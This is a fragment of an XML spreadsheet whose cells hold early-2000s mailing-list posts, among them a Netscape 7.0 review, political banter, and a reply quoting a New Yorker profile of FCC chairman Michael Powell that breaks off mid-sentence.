activist with Privacy International, calls the database "a dumb idea.""Immediately you have to wonder if you're allowed to use anonymous 
mobile phones or whether you're allowed to connect to the Internet 
anonymously," Hosein said.A representative for George Radwanski 
, Canada's privacy commissioner, said 
the office is reviewing the blueprint and does not "have any comments on 
the paper as it stands."Comments on the proposal can be sent to la-al@justice.gc.ca 
 no later than Nov. 15.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; I'm not sure what you mean by "let's you and him fight", but it is 
&gt; important to remember that England was in control of Ireland
&gt; for 300 years ...Exactly -- "let's you and him fight" is a
way of dealing with troublesome populations
by moving them next to one another, so they
give each other, and not the Man, grief*.So by my understanding (and, you all will
understand, with tongue firmly in cheek):Ireland:  Irish?  Uppity barbarians overly
   fond of "risings".  Scots?  More uppity
   barbarians overly fond of "risings".
   Why not plonk down a bunch of the latter
   next to the former and kill two birds
   with one stone?Israel:  Ex-ottomans?  Uppity barbarians
   (didn't they help kick out the Ottomans?)
   Zionists?  Uppity sorts who aren't happy
   with perfectly good land in Uganda.  Why
   not plonk down a bunch of the latter next
   to the former and kill two birds with one
   stone?but not:India: in which the muslims and hindus were
    originally intermixed to some degree,
    but Partioned due to their own conflict,
    not due to English resettlement policy.Canada: in which the french and english were
    already established, and it was just the
    balance of power on the continent that
    determined events in the colonies.  The
    Acadians got resettled, but they don't
    seem to have been that good for picking
    fights with their neighbors, so no one
    had them plonked down next door.-Dave* this works best with a populace who,
given "one man, one vote", immediately
deduce "one less man, one less vote" --
eh, Magnan?
</t>
  </si>
  <si>
    <t xml:space="preserve">This is my Netscape 7.0 Review.o They finally got the email search speed back up to
   where it was in 4.7.x
o Setting up user mail accounts doesn't have that really
   odd, sometimes it lets me sometimes it doesn't problem that
   previous versions had.
o I still have to manually update all my address books by
   hand but at least it lets me import them as Netscape 4.x
   address books (there's not 6.x import as they just assume
   it works--which it doesn't)
o The mail filters are still broken and have the same problem that
   I've tried to report since 4.0.2 where you can't store a mail
   filter of the type: Age in days, is greater than, 21 (or some number)
   Gawd I'd really wish they'd fix that freakin' bug, it's the single
   biggest annoyance that I have with Netscape as it's one of the
   most effective anti-spam tools that I have.
o Webex doesn't support Netscape 7.0 and the plugin doesn't
   work which causes problems when you want to use Webex to
   work on something with someone remotely.I've given up trying to report bugs and any changes to the
source I send always get lost.Greg
-- 
Gregory Alan Bolcer, CTO  | work: +1.949.833.2800
gbolcer at endeavors.com  | http://endeavors.com
Endeavors Technology, Inc.| cell: +1.714.928.5476
</t>
  </si>
  <si>
    <t xml:space="preserve">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years.I love the smell of Euro-chauvinism in the morning.First,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because they nominally speak the same language.  A
Wyoming rancher has almost nothing in common culturally or socially with
your average person living in San Francisco, despite speaking the same
language and nominally living in the same country.  If I want to visit a
wildly different culture for the holidays, I'll go to Oakland, New
Orleans, or similar -- they are far more different from where I live
than some countries I've traveled to.  And a lot of these places are
farther from where I live than Spain is from Germany.Second, the State I live in is the size of Germany.  When I travel to a
neighboring State (which I do regularly), how is this not equivalent? 
In fact, I probably travel much farther for the holidays than your
German construction workers.  If you look at the EU as a single country,
only then does your analogy become comparable.  What kind of ridiculous
superiority do Europeans get from having (relatively) tiny countries?In truth, I find Europe to be about as culturally homogeneous as the
US.  There are a lot of cultural similarities across the EU with
relatively minor local deviations that vary with distance in ways very
similar to the US.  The only real difference is that Europeans have
dozens of different languages, which is hardly something I would call an
advantage.  Although there are a couple parts of the US where I can't
understand a word they are saying either. 
-James Rogers
 jamesr@best.com
</t>
  </si>
  <si>
    <t>I got to see Powell talk in March 2001 at the beginning of his
reign at the FCC.  He said they were going to take a real
hands off approach, so it's funny that they would blame
the regulators for causing the collapse.  One thing he did
get right, is that he wasn't worried that the US was behind
Europe in the wireless licensing spectrum.  This is something
very prescient in that most of those licensors have had to
eat their lunch over the huge licensing costs they paid for
very little benefit.  His legacy was/is supposed to be
rethinking the FCC's role to stay out of the way in this
period of business innovation in the wireless space as he
didn't want the government forcing business models onto
the private sector.His full transcript is here [1].  Interestingly enough I
got to see his speech in person as he was part of the whole
CTIA'2001 Las Vegas keynote series of speakers.  Clay and
I hoped a flight out of Ontario to Las Vegas to do demo support
for Craig Barrett [2].  His message was that there's no difference
between wired and wireless Internet--it's all the same thing.
Instead of scalable networks, we should be thinking about scalable
content (&amp; using Magi he showed sending a blue man tv commercial
from a desktop to a laptop to an ipaq to a color smartphone with
the content scaling back for each target platform).The best part of the whole trip wasn't hobnobbing at all,
but really the fact that the Venetian had ran out of rooms.
They decided to put us up in one of their $10,000/night high
roller rooms.  They put Clay in one and me in another.
The Venetian is known for having the largest hotel rooms
anywhere, but these ones were bigger than my whole house. 8-)Greg
[1] http://www.fcc.gov/Speeches/Powell/2001/spmkp101.html
[2] http://www.intel.com/pressroom/archive/speeches/cb20010320.htmRohit Khare wrote:
&gt; I can't believe I actually read a laugh-out-loud funny profile of the 
&gt; *FCC Commissioner* fer crissakes! So the following article comes 
&gt; recommended, a fine explanation of Michael Powell's extraordinary 
&gt; equivocation.
&gt; 
&gt; On the other hand, I can also agree with Werbach's Werblog entry... Rohit
&gt; 
&gt;&gt; A Trip to F.C.C. World
&gt;&gt;
&gt;&gt; Nicholas Lemann has a piece in the New Yorker this week about FCC 
&gt;&gt; Chairman Michael Powell.  It's one of the first articles I've seen 
&gt;&gt; that captures some of Powell's real personality, and the way he's 
&gt;&gt; viewed in Washington.  Unfortunately, Lemann ends by endorsing 
&gt;&gt; conventional political wisdom.  After describing how Powell isn't 
&gt;&gt; really a fire-breathing ideological conservative, he concludes that, 
&gt;&gt; in essence, Powell favors the inumbent local Bell telephone companies, 
&gt;&gt; while a Democratic FCC would favor new entrants.  I know that's not 
&gt;&gt; how Powell sees the world, and though I disagree with him on many 
&gt;&gt; issues, I think he's right to resist the old dichotomy.
&gt;&gt;
&gt;&gt; The telecom collapse should be a humbling experience for anyone who 
&gt;&gt; went through it.  The disaster wasn't the regulators' fault, as some 
&gt;&gt; conservatives argue.  But something clearly went horribly wrong, and 
&gt;&gt; policy-makers should learn from that experience.  Contrary to Lemann's 
&gt;&gt; speculation, the upstart carriers won't be successful in a Gore 
&gt;&gt; administration, because it's too late.  Virtually all of them are 
&gt;&gt; dead, and Wall Street has turned off the capital tap for the 
&gt;&gt; foreseeable future.  Some may survive, but as small players rather 
&gt;&gt; than world-dominators. 
&gt;&gt;
&gt;&gt; The battle between CLECs and RBOCs that Lemann so astutely parodies is 
&gt;&gt; old news.  The next important battle in telecom will be between those 
&gt;&gt; who want to stay within the traditional boxes, and those who use 
&gt;&gt; different models entirely.  That's why open broadband networks and 
&gt;&gt; open spectrum are so important.  Whatever the regulatory environment, 
&gt;&gt; there is going to be consolidation in telecom.  Those left out in that 
&gt;&gt; consolidation will face increasing pressure to create new pipes into 
&gt;&gt; the home, or slowly die. The victors in the consolidation game will 
&gt;&gt; cut back on innovation and raise prices, which will create further 
&gt;&gt; pressure for alternatives. 
&gt;&gt;
&gt;&gt; Lemann is right that policy-making looks much drier and more ambiguous 
&gt;&gt; on the ground than through the lens of history.  But he's wrong in 
&gt;&gt; thinking that telecom's future will be something like its past.
&gt;&gt;
&gt;&gt; Friday, October 04, 2002
&gt;&gt; 11:17:11 AM  comments {0} 
&gt; 
&gt; 
&gt; ==============================================================
&gt; http://www.newyorker.com/printable/?fact/021007fa_fact
&gt; 
&gt; THE CHAIRMAN   
&gt; by NICHOLAS LEMANN
&gt; He's the other Powell, and no one is sure what he's up to.
&gt; New Yorker, October 8, 2002
&gt; 
&gt; Last year, my middle son, in eighth grade and encountering his first 
&gt; fairly serious American-history course, indignantly reported that the 
&gt; whole subject was incomprehensible. I was shocked. What about Gettysburg 
&gt; and the Declaration of Independence and the Selma-to-Montgomery march? 
&gt; Just look at my textbook, he said, and when I did I saw his point. His 
&gt; class had got up to the eighteen-forties. What I expected was a big 
&gt; beefing up of the roles of Sacagawea and Crispus Attucks, and, in-deed, 
&gt; there was some of that. But the main difference between my son's text 
&gt; and that of my own childhood was that somebody had made the disastrous 
&gt; decision to devote most of it to what had actually happened in American 
&gt; history. There were pages and pages on tariffs and bank charters and 
&gt; reciprocal trade agreements. I skipped ahead, past the Civil War, hoping 
&gt; for easier going, only to encounter currency floats and the regulation 
&gt; of freight rates. Only a few decades into the twentieth century did it 
&gt; become possible to see the federal government's main function as 
&gt; responding to dramatic crises and launching crusades for social justice, 
&gt; instead of attempting to referee competing claims from economic interests.
&gt; 
&gt; Even now, if one were to reveal what really goes on behind the pretty 
&gt; speeches and the sanctimonious hearings in Washington, what you'd find 
&gt; is thousands of lawyers and lobbyists madly vying for advantage, not so 
&gt; much over the public as over each other: agribusiness versus real 
&gt; estate, banks versus insurance companies, and so on. The arena in which 
&gt; this competition mainly takes place is regulatory agencies and 
&gt; commissions and the congressional committees that supervise them. It's 
&gt; an insider's game, less because the players are secretive than because 
&gt; the public and the pressâ€”encouraged by the players, who speak in jargonâ€”
&gt; can't get themselves interested.
&gt; 
&gt; One corner of Washington might be called F.C.C. World, for the Federal 
&gt; Communications Commission. F.C.C. World has perhaps five thousand 
&gt; denizens. They work at the commission itself, at the House and Senate 
&gt; commerce committees, and at the Washington offices of the companies that 
&gt; the commission regulates. They read Communications Daily (subscription 
&gt; price: $3,695 a year), and every year around Christmastime they 
&gt; grumblingly attend the Chairman's Dinner, at a Washington hotel, where 
&gt; the high point of the evening is a scripted, supposedly self-deprecating 
&gt; comedy routine by the commission's chairman.
&gt; 
&gt; Of all the federal agencies and commissions, the F.C.C. is the one that 
&gt; Americans ought to be most interested in; after all, it is involved with 
&gt; a business sector that accounts for about fifteen per cent of the 
&gt; American economy, as well as important aspects of daily lifeâ€”telephone 
&gt; and television and radio and newspapers and the Internet. And right now 
&gt; F.C.C. World is in, if not a crisis, at least a very soapy lather, 
&gt; because a good portion of what the angry public thinks of as the 
&gt; "corporate scandals" concerns the economic collapse of companies 
&gt; regulated by the F.C.C. Qwest, WorldCom, Adelphia, and Global Crossing, 
&gt; among others, are (or were) part of F.C.C. World. AOL Time Warner is 
&gt; part of F.C.C. World. Jack Grubman, the former Salomon Smith Barney 
&gt; analyst who seems to have succeeded Kenneth Lay, of Enron, as the 
&gt; embodiment of the corporate scandals, is part of F.C.C. World. In the 
&gt; past two years, companies belonging to F.C.C. World have lost trillions 
&gt; of dollars in stock-market valuation, and have collectively served as a 
&gt; dead weight pulling down the entire stock market.
&gt; 
&gt; This year, an alarmed and acerbic anonymous memorandum about the state 
&gt; of the F.C.C. has been circulating widely within F.C.C. World. It evokes 
&gt; F.C.C. World's feverish mood ("The F.C.C. is fiddling while Rome burns") 
&gt; and suggests why nobody besides residents of F.C.C. World has thought of 
&gt; the commission in connection with the corporate scandals. The sentence I 
&gt; just quoted is followed by this explanation: "The ILECs appear likely to 
&gt; enter all l.d. markets within twelve months, while losing virtually no 
&gt; residential customers to attackers since 1996, and suffering about 10% 
&gt; market share loss in business lines to CLECs." It's a lot easier to 
&gt; think about evil C.E.O.s than to decipher that.
&gt; 
&gt; 
&gt; Even in good times, F.C.C. World pays obsessive attention to the 
&gt; commission's chairman. In bad times, the attention becomes especially 
&gt; intense; and when the chairman is a celebrity F.C.C. World devotes 
&gt; itself to full-time chairman-watching. The current chairman, Michael 
&gt; Powell, is a celebrity, at least by government-official standards, 
&gt; because he is the only son of Colin Powell, the Secretary of State. 
&gt; Unlike his father, he has a kind of mesmerizing ambiguity, which 
&gt; generates enormous, and at times apoplectically toned, speculation about 
&gt; who he really is and what he's really up to. Powell is young to be the 
&gt; head of a federal agencyâ€”he is thirty-nineâ€”and genially charming. 
&gt; Everybody likes him. Before becoming chairman, he was for three years 
&gt; one of the F.C.C.'s five commissioners; not only is he fluent in the 
&gt; F.C.C.'s incomprehensible patois, he has a Clintonesque love of the 
&gt; arcane details of communications policy. He's always saying that he's an 
&gt; "avid moderate." And yet he has a rage-inciting quality. One of his 
&gt; predecessors as chairman, Reed Hundt, quoted in Forbes, compared Powell 
&gt; to Herbert Hoover. Mark Cooper, of the Consumer Federation of America, 
&gt; calls him "radical and extreme." Just as often as he's accused of being 
&gt; a right-wing ideologue, Powell gets accused of being paralytically 
&gt; cautious. "It ain't about singing 'Kum-Ba-Yah' around the campfire," 
&gt; another former chairman, William Kennard, says. "You have to have an 
&gt; answer." One day last spring, Powell, testifying before a Senate 
&gt; subcommittee, delivered an anodyne opening statement, and the 
&gt; subcommittee's chairman, Ernest Hollings, of South Carolina, berated 
&gt; him. "You don't care about these regulations," Hollings said. "You don't 
&gt; care about the law or what Congress sets down. . . . That's the 
&gt; fundamental. That's the misgiving I have of your administration over 
&gt; there. It just is amazing to me. You just pell-mell down the road and 
&gt; seem to not care at all. I think you'd be a wonderful executive 
&gt; vice-president of a chamber of commerce, but not a chairman of a 
&gt; regulatory commission at the government level. Are you happy in your job?"
&gt; 
&gt; "Extremely," Powell said, with an amiable smile.
&gt; 
&gt; 
&gt; One cannot understand Powell's maddening effect, at least on Democrats 
&gt; and liberal activists, without understanding not just the stated purpose 
&gt; of the commission he chairs but also its real purpose. The F.C.C. was 
&gt; created by Congress in 1934, but it existed in prototype well before the 
&gt; New Deal, because it performs a function that is one of the classic easy 
&gt; cases for government intervention in the private economy: making sure 
&gt; that broadcasters stick to their assigned spots on the airwaves. Its 
&gt; other original function was preventing American Telephone &amp; Telegraph, 
&gt; the national monopoly phone company, from treating its customers 
&gt; unfairly. Over the decades, as F.C.C. World grew up into a comfortable, 
&gt; well-established place, the F.C.C. segued into the role of industrial 
&gt; supervisionâ€”its real purpose. It was supposed to manage the competition 
&gt; among communications companies so that it didn't become too bloody, by 
&gt; artfully deciding who would be allowed to enter what line of business. 
&gt; In addition to looking out for the public's interest, the commission 
&gt; more specifically protected the interests of members of Congress, many 
&gt; of whom regard the media companies in their districts as the single most 
&gt; terrifying category of interest groupâ€”you can cross the local bank 
&gt; president and live to tell the tale, but not the local broadcaster. 
&gt; According to an oft-told F.C.C. World anecdote, President Clinton once 
&gt; blocked an attempt to allow television stations to buy daily newspapers 
&gt; in the same city because, he said, if the so-and-so who owned the 
&gt; anti-Clinton Little Rock Democrat-Gazette had owned the leading TV 
&gt; station in Little Rock, too, Clinton would never have become President.
&gt; 
&gt; 
&gt; F.C.C. World may have been con tentious, but it was settled, too, 
&gt; because all the reasonably powerful players had created secure economic 
&gt; niches for themselves. Then, in the nineteen-eighties, the successful 
&gt; breakup of A.T. &amp; T.â€”by far the biggest and most important company the 
&gt; commission regulatedâ€”deposited a thick additional sediment of 
&gt; self-confidence onto the consciousness of F.C.C. World. A generation 
&gt; ago, for most Americans, there was one local phone company, one 
&gt; long-distance company, and one company that manufactured telephones, 
&gt; which customers were not permitted to ownâ€”and they were all the same 
&gt; company. It was illegal to plug any device into a phone line. By the 
&gt; mid-nineteen-nineties, there were a dozen economically viable local 
&gt; phone companies, a handful of national long-distance companies competing 
&gt; to offer customers the lowest price and best service, and stores 
&gt; everywhere selling telephone equipment from many manufacturersâ€”and 
&gt; millions of Americans had a fax machine and a modem operating over the 
&gt; telephone lines. A.T. &amp; T. had argued for years that it was a "natural 
&gt; monopoly," requiring protection from economic competition and total 
&gt; control over its lines. So much for that argument. Over the same period, 
&gt; the F.C.C. had assisted in the birth of cable television and cell phones 
&gt; and the Internet. It was the dream of federal-agency success come true: 
&gt; consumers vastly better served, and the industry much bigger and more 
&gt; prosperous, too.
&gt; 
&gt; The next big step was supposed to be the Telecommunications Act of 1996, 
&gt; one of those massive, endlessly lobbied-over pieces of legislation which 
&gt; most people outside F.C.C. World probably felt it was safe to ignore. 
&gt; Although the Telecom Act sailed under the rhetorical banner of 
&gt; modernization and deregulation, its essence was a grand interest-group 
&gt; bargain, in which the local phone companies, known to headline writers 
&gt; as "baby Bells" and to F.C.C. World as "arbocks" (the pronounced version 
&gt; of RBOCs, or regional Bell operating companies), would be permitted to 
&gt; offer long-distance service in exchange for letting the long-distance 
&gt; companies and smaller new phone companies use their lines to compete for 
&gt; customers. Consumers would win, because for the first time they would 
&gt; get the benefits of competition in local service while getting even more 
&gt; competition than they already had in long distance. But the politics and 
&gt; economics of the Telecom Act (which was shepherded through Congress by 
&gt; Vice-President Gore) were just as important. Democrats saw the act as 
&gt; helping to reposition them as the technology partyâ€”the party that 
&gt; brought the Internet into every home, created hundreds of thousands of 
&gt; jobs in new companies, and, not least, set off an investment boom whose 
&gt; beneficiaries might become the party's new contributor base. Clinton's 
&gt; slogans about the "information superhighway" and "building a bridge to 
&gt; the twenty-first century," which, like all Clinton slogans, artfully 
&gt; sent different messages to different constituencies, were the rhetorical 
&gt; correlates of the Telecom Act, and Gore's cruise to the Presidency was 
&gt; supposed to be powered substantially by the act's success.
&gt; 
&gt; The F.C.C. had a crucial role in all this. The arbocks are rich, 
&gt; aggressive, politically powerful, and generally Republican (though like 
&gt; all important interest groups they work with both parties); they 
&gt; immediately filed lawsuits, which wound up tying the hands of their new 
&gt; competitors in the local phone market for more than three years. Through 
&gt; rule-making, enforcement, and litigation, the F.C.C., then headed by 
&gt; Reed Hundt, who was Gore's classmate at St. Albans, was supposed to keep 
&gt; the arbocks in their cages, so that not only long-distance companies 
&gt; like A.T. &amp; T. and MCI WorldCom but also a whole category of new 
&gt; companies, "see-lecks" (the pronounced version of CLECs, or competitive 
&gt; local exchange carriers), could emerge. This entailed the regulatory 
&gt; equivalent of hand-to-hand combat: the see-leck is supposed to have 
&gt; access to the arbock's switching equipment, the arbock won't give the 
&gt; seeleck a key to the room where it's kept, so the see-leck asks the 
&gt; F.C.C. to rule that the arbock has to give it the key.
&gt; 
&gt; Partly because Hundt assured the see-lecks and other new companies that 
&gt; he would protect them, and partly because of the generally booming 
&gt; condition of the economy then, investment capital flooded into the 
&gt; see-lecksâ€”companies with names like Winstar, Covad, and Teligentâ€”and 
&gt; into other telecommunications companies. Even not obviously related 
&gt; technology companies like Cisco Systems benefitted from the telecom 
&gt; boom: demand for their products was supposed to come from the see-lecks 
&gt; and other new players. There would be no conflict between the interests 
&gt; of the new telecom companies and those of consumers; as one of Hundt's 
&gt; former lieutenants told me, "Reed used to joke that my job was to make 
&gt; sure that all prices went down and all stocks went up."
&gt; 
&gt; 
&gt; The years following the passage of the Telecom Act were the peak of the 
&gt; boom. Wall Street had its blood up, and that meant not just more 
&gt; startups but also more mergers of existing communications companies: 
&gt; Time Warner and AOL decided to throw in together, and A.T. &amp; T. and 
&gt; Comcast, and so on. (Surely, WorldCom and the other telecom bad guys 
&gt; believed that their self-dealing, stock-overselling, and creative 
&gt; accounting would go unnoticed because the market was so undiscriminating.)
&gt; 
&gt; By the time the outcome of the 2000 Presidential election had been 
&gt; determined, the telecom crash was well under way. Nonetheless, the 
&gt; chairmanship of the F.C.C. remained one of the best jobs, in terms of 
&gt; influence and visibility, available to a career government regulator. 
&gt; Three Republicans emerged as candidates: Powell, who was a commissioner; 
&gt; Harold Furchtgott-Roth, the farthest-to-the-right commissioner; and 
&gt; Patrick Wood, the head of the Texas Public Utility Commission and, as 
&gt; such, a George W. Bush guy. In Texas, however, Wood had crossed the most 
&gt; powerful person in the arbock camp, Edward Whitacre, the C.E.O. of 
&gt; S.B.C. Communications, which is headquartered in San Antonio. This meant 
&gt; that the arbocks didn't want Wood as head of the F.C.C., because he 
&gt; might be too pro-see-leck. (Wood is now the head of the Federal Energy 
&gt; Regulatory Commission.) Michael Powell had to signal the arbocks that he 
&gt; wasn't as threatening as Wood, while also signalling the conservative 
&gt; movement that he was only negligibly farther to the left than 
&gt; Furchtgott-Roth.
&gt; 
&gt; Powell did this deftly. For example, in December of 2000 he appeared 
&gt; before a conservative group called the Progress &amp; Freedom Foundation and 
&gt; gave a very Michael Powell speechâ€”whimsical, intellectual, and 
&gt; free-associative (Biblical history, Joseph Schumpeter, Moore's Law)â€”that 
&gt; began by making fun of the idea that the F.C.C. should try to keep new 
&gt; telecom companies alive. "In the wake of the 1996 Act, the F.C.C. is 
&gt; often cast as the Grinch who stole Christmas," Powell said. "Like the 
&gt; Whos, down in Who-ville, who feast on Who-pudding and rare Who-roast 
&gt; beast, the communications industry was preparing to feast on the 
&gt; deregulatory fruits it believed would inevitably sprout from the Act's 
&gt; fertile soil. But this feast the F.C.C. Grinch did not like in the 
&gt; least, so it is thought." Thus Powell was indicating that if he became 
&gt; chairman he didn't expect to administer first aid to the see-lecks as 
&gt; part of the job. He was appointed to the chairmanship on the first day 
&gt; of the Bush Administration.
&gt; 
&gt; Twenty months into the Administration, nearly all the see-lecks are dead 
&gt; or dying; nearly all long-distance companies, not just WorldCom, are in 
&gt; serious trouble; cable companies have lost half their value; satellite 
&gt; companies are staggering. The crash has had an automatically 
&gt; concentrating effect, because as new companies die the existing 
&gt; companies' market share increases, and, if the existing companies are in 
&gt; good shape financially, they have the opportunity to pick up damaged 
&gt; companies at bargain prices. During the Bush Administration, as the 
&gt; financial carnage in communications has worsened, the communications 
&gt; industry has moved in the direction of more concentration. If the Bells 
&gt; wind up protecting their regional monopolies in local phone service, and 
&gt; if they also merge, the country will be on its way to having a national 
&gt; duopoly in local service: Verizon, in the East, and S.B.C., in the West. 
&gt; And these companies could dominate long distance as well, because of the 
&gt; poor health of the long-distance companies.
&gt; 
&gt; The cable business also seems close to having two dominant national 
&gt; companies, AOL Time Warner and Comcast. Unlike the phone companies, they 
&gt; don't have to share their wiring with other companies and so can more 
&gt; fully control what material they allow to enter people's homes. As part 
&gt; of the complicated bargaining with interest groups that led to the 1996 
&gt; Telecom Act, the limits on concentration in the radio industry were 
&gt; significantly loosened, and in the past six years the number of 
&gt; radio-station owners in the United States has been cut by twenty-five 
&gt; per cent; today, a large portion of local and national radio news 
&gt; programming is supplied by a single company, Westwood One, a subsidiary 
&gt; of Viacom.
&gt; 
&gt; In this situation, many Democrats and liberals think, the F.C.C. should 
&gt; be hyperactiveâ€”the superhero of government regulation, springing to the 
&gt; rescue of both consumers and the communications industry. It should try 
&gt; to breathe life into the see-lecks and other new companies. It should 
&gt; disallow mergers, maintain ownership limits, and otherwise restrain the 
&gt; forces of concentration. It should use the government's money and muscle 
&gt; to get new technologyâ€”especially fast Internet connectionsâ€”into the 
&gt; homes of people who can't afford it at current market prices. (An 
&gt; analogy that a lot of people in F.C.C. World make is between telecom and 
&gt; the Middle East: the Clinton people blame the bloodshed on the Bush 
&gt; people, because they disengaged when they came into office, and the Bush 
&gt; people blame it on the Clinton people, because they raised too many 
&gt; expectations and stirred too many passions.)
&gt; 
&gt; But Michael Powell's F.C.C. has not been hyperactive. Powell has been 
&gt; conducting internal policy reviews and reforming the management of the 
&gt; F.C.C. and waiting for the federal courts and the Congress to send him 
&gt; signals. (In mid-September, Powell finally initiated a formal review of 
&gt; the F.C.C.'s limits on media concentration.) This doesn't mean he has 
&gt; been inactive; rather, he has been active in a way that further 
&gt; infuriates his criticsâ€”in a manner that smoothly blends the genial and 
&gt; the provocative, he muses about whether the fundamental premises of 
&gt; F.C.C. World really make sense, while giving the impression that he's 
&gt; having the time of his life as chairman. At his first press conference, 
&gt; when he was asked what he was going to do about the "digital 
&gt; divide"â€”that is, economic inequality in access to the Internetâ€”he said, 
&gt; "You know, I think there is a Mercedes divide. I'd like to have one and 
&gt; I can't afford one." At the National Cable &amp; Telecommunications 
&gt; Association convention, in Chicago, Powell, following a troupe of 
&gt; tumblers to the stage, interrupted his walk to the podium to perform a 
&gt; somersault.
&gt; 
&gt; 
&gt; Not long ago, I went to see Powell in his office at the F.C.C. Until 
&gt; 1998, when the commission moved to a new building in Southwest 
&gt; Washington, near the city's open-air fish market, F.C.C. World was at 
&gt; the western edge of downtown, where everybody would encounter everybody 
&gt; else at a few familiar restaurants and bars. Today, the F.C.C. building 
&gt; looks like the office of a mortgage company in a suburban office park. 
&gt; Even the chairman's suite, though large, is beige, carpeted, and 
&gt; fluorescent. Powell is a bulky man who wears gold-rimmed glasses and 
&gt; walks with a pronounced limp, the result of injuries he suffered in a 
&gt; jeep accident in Germany, in 1987, when he was an Army officer. Because 
&gt; of the accident, he left the Army and went to law school, where he 
&gt; became entranced with conservative ideas about regulation, particularly 
&gt; the idea that the government, rather than trying to correct the flaws of 
&gt; the market before the factâ€”"prophylactically," as he likes to sayâ€”should 
&gt; wait till the flaws manifest themselves and then use antitrust 
&gt; litigation to fix them. He worked briefly at a corporate law firm, and 
&gt; then became a protÃ©gÃ© of Joel Klein, the head of the antitrust division 
&gt; of the Clinton Justice Department and the man who led the government's 
&gt; legal case against Microsoft. (He was recently appointed chancellor of 
&gt; the New York public-school system.) It testifies to Powell's political 
&gt; skill that he is probably the only high official in the Bush 
&gt; Administration who not only served in the Clinton Administration but 
&gt; also maintains close ties to Bush's nemesis Senator John McCain, of 
&gt; Arizona. One of the things about Powell that annoy people is his 
&gt; enduring love of law schoolâ€”"It's sort of like a law-school study 
&gt; session over there," one Democratic former commissioner said. As if to 
&gt; confirm the charge, Powell, when I arrived, introduced me to four law 
&gt; students, summer interns at the commission, whom he'd invited to sit in.
&gt; 
&gt; I began by asking Powell whether he agreed with the founding assumptions 
&gt; of the F.C.C. For example, could private companies have apportioned the 
&gt; airwaves among themselves without the government being involved?
&gt; 
&gt; "I think we'll never know," Powell said. "I don't think it's an 
&gt; automatically bad idea, the way some people will argue. Land is probably 
&gt; the best analogue. We don't seize all the land in the United States and 
&gt; say, 'The government will issue licenses to use land.' If my neighbor 
&gt; puts a fence one foot onto my property line, there's a whole body of law 
&gt; about what I can do about that, including whether I can tear it down. If 
&gt; a wireless company was interfering with another wireless company, it's a 
&gt; similar proposition. There are scholars who argueâ€”indeed, the famous 
&gt; Ronald Coase treatise that won the Nobel Prize was about thisâ€”that 
&gt; spectrum policy is lunacy. The market could work this out, in the kinds 
&gt; of ways that we're accustomed to."
&gt; 
&gt; Talking to Powell was fun. Unlike most high government officials, he 
&gt; doesn't seem to be invested in appearing dignified or commanding. He 
&gt; slumps in his chair and fiddles with his tie and riffs. He speaks in 
&gt; ironic air quotes. He's like your libertarian friend in college who 
&gt; enjoyed staying up all night asking impertinent rhetorical questions 
&gt; about aspects of life that everybody else takes for granted but that he 
&gt; sees as sentimental or illogical. After a while, I asked him whether he 
&gt; thought his predecessors' excitement about the 1996 Telecommunications 
&gt; Act had been excessive.
&gt; 
&gt; "I would start with a caveat," Powell said. "Look, I can't fault those 
&gt; judgments in and of themselves, given the time and what people thought. 
&gt; They were not the only ones who were hysterical about the opportunities. 
&gt; But, frankly, I've always been a little bit critical. First of all, 
&gt; anybody who works with the act knows that it doesn't come anywhere close 
&gt; to matching the hyperbole that was associated with it, by the President 
&gt; on down, about the kinds of things it's going to open up. I mean, I 
&gt; don't know what provisions are the information-superhighway provisions, 
&gt; or what provisions are so digitally oriented, or some of the things that 
&gt; were a big part of the theatre of its introduction. When one starts 
&gt; reading the details, one searches, often in vain, for these provisions. 
&gt; But, nonetheless, there was a rising dot-com excitement, and an Internet 
&gt; excitement, and people thought this was historic legislation, and it 
&gt; certainly was.
&gt; 
&gt; "But. We were sucking helium out of balloons, with the kinds of 
&gt; expectations that were being bandied around, and this is before the 
&gt; economy or the market even gets in trouble. It was a dramatically 
&gt; exaggerated expectationâ€”by the leadership of the commission, by 
&gt; politicians, by the market itself, by companies themselves. It was a 
&gt; gold rush, and led to some very detrimental business decisions, ones 
&gt; that government encouraged by its policies, frankly. Everybody wanted to 
&gt; see numbers go up on the board."
&gt; 
&gt; Powell began imitating an imagined true believer in the Telecom Act. " 
&gt; 'I want to see ten competitors. Twenty competitors! I want to see 
&gt; thirty-per-cent market share. Fifty-per-cent market share! I want the 
&gt; Bells to bleed! Then we'll know we've succeeded.' " Now Powell returned 
&gt; to being Powell. "I think that expectation was astonishingly 
&gt; unrealistic, in the short term. They wanted to see it while they're 
&gt; there. We were starting to get drunk on the juice we were drinking. And 
&gt; the market was getting drunk on the juice we were drinking. There's no 
&gt; question, we went too soon too fast. Too many companies took on too much 
&gt; debt too fast before the market really had a product, or a business model."
&gt; 
&gt; How could the Telecom Act have been handled better? "We could have 
&gt; chosen policies that were less hellbent on a single objective, and were 
&gt; slightly more balanced and put more economic discipline in the system," 
&gt; Powell said. "Money chased what seemed like government-promised 
&gt; opportunity. The problem with that is there's a morning after, and we're 
&gt; in it. And the problem is there is no short fix for this problem. This 
&gt; debt is going to take years to bring down to a realistic level. In some 
&gt; ways, for short-term gain, we paid a price in long-term stability."
&gt; 
&gt; Powell went on to say that it might have turned out differently if there 
&gt; had been a more "reasonable" level of investment. "No, we wouldn't have 
&gt; every home in America with competitive choice yetâ€”but we don't anyway. I 
&gt; don't think it's the remonopolization of telephone service. I don't buy 
&gt; that. The Bells will prosper, but did anybody believe they wouldn't? The 
&gt; part of the story that didn't materialize was that people thought so 
&gt; would MCI WorldCom and Sprint."
&gt; 
&gt; Other local phone companies, he added, hadn't materialized as viable 
&gt; businesses, either, and they never might. "Everybody's always saying, 
&gt; 'The regulators did this and this and this.' But, candidly, the story's 
&gt; quite the opposite. I think the regulators bent over backward for six 
&gt; years to give them a chance. Conditions don't get that good except once 
&gt; every thirty years, and it didn't happen. So, whatever the reason, we're 
&gt; looking at a WorldCom that's teetering. We're looking at a long-distance 
&gt; business that has had a rapid decline in its revenue base. A.T. &amp; T. is 
&gt; breaking itself up. Sprint has struggled."
&gt; 
&gt; Could the F.C.C. have done anything to make the long-distance companies 
&gt; stronger? "At the F.C.C.? I think I'll just be blunt. My political 
&gt; answer? Yes, there's all</t>
  </si>
  <si>
    <t xml:space="preserve">Begin forwarded message:&gt; From: Ian Andrew Bell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to the econo-political news sector, which has 
&gt; found post-economic-bubble coverage to be both tiresome and 
&gt; deoressing.  The establishment of this new stock exchange would of 
&gt; course create jobs for newly unemployed (and governmentally retrained) 
&gt; IT systems engineers who could, after passing the electoral securities 
&gt; exam, become floor traders.
&gt;
